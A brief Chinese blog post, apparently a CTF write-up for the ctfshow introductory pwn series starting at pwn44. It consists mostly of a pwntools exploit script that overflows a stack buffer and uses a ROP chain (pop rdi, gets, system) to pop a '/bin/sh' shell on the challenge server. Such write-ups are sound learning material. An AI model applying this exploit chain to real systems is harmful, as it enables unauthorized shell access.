高考完了高三一年都没怎么碰CTF有点生疏了,现在ctfshow的pwn入门系列持续更新。
pwn44之前的以前都做了就懒得重新做了,直接重pwn44开始。
太懒了就直接贴代码,重要的知识点我会写出来。
from pwn import *
from LibcSearcher import *
# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28197)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
buf = 0x602080
system_addr = 0x400520
gets_addr = 0x400530
pop_rdi = 0x00000000004007f3
paylaod = b"a"*(0xa+8)+p64(pop_rdi)+p64(buf)+p64(gets_addr)+p64(pop_rdi)+p64(buf)+p64(system_addr)
ru("get system parameter!")
sl(paylaod)
sl(b"/bin/sh")
itr()